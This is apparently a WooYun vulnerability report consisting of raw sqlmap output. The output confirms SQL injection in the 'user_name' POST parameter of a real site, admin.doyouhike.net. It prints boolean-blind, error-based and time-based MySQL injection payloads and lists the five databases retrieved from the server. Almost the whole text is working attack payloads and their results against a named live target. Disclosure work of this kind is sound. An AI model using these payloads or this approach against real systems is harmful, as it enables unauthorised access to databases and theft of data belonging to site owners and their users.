WooYun.org

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the oth
ers (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 195 HTTP(s) r
equests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: user_name=' AND 2981=2981 AND 'KRGQ'='KRGQ&file_name=
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: user_name=' AND (SELECT 7778 FROM(SELECT COUNT(*),CONCAT(0x716a7871
71,(SELECT (ELT(7778=7778,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'TkvV'='TkvV&file_name=
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: user_name=' AND (SELECT * FROM (SELECT(SLEEP(5)))kDsx) AND 'Zfor'='
Zfor&file_name=
---
[17:12:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[17:12:46] [INFO] fetching database names
[17:12:47] [INFO] the SQL query used returns 5 entries
[17:12:47] [INFO] retrieved: information_schema
[17:12:47] [INFO] retrieved: bizrc
[17:12:47] [INFO] retrieved: click
[17:12:47] [INFO] retrieved: g3rc
[17:12:47] [INFO] retrieved: sphinx
available databases [5]:
[*] bizrc
[*] click
[*] g3rc
[*] information_schema
[*] sphinx
[17:12:47] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 179 times
[17:12:47] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\admin.doyouhike.net'
[*] shutting down at 17:12:47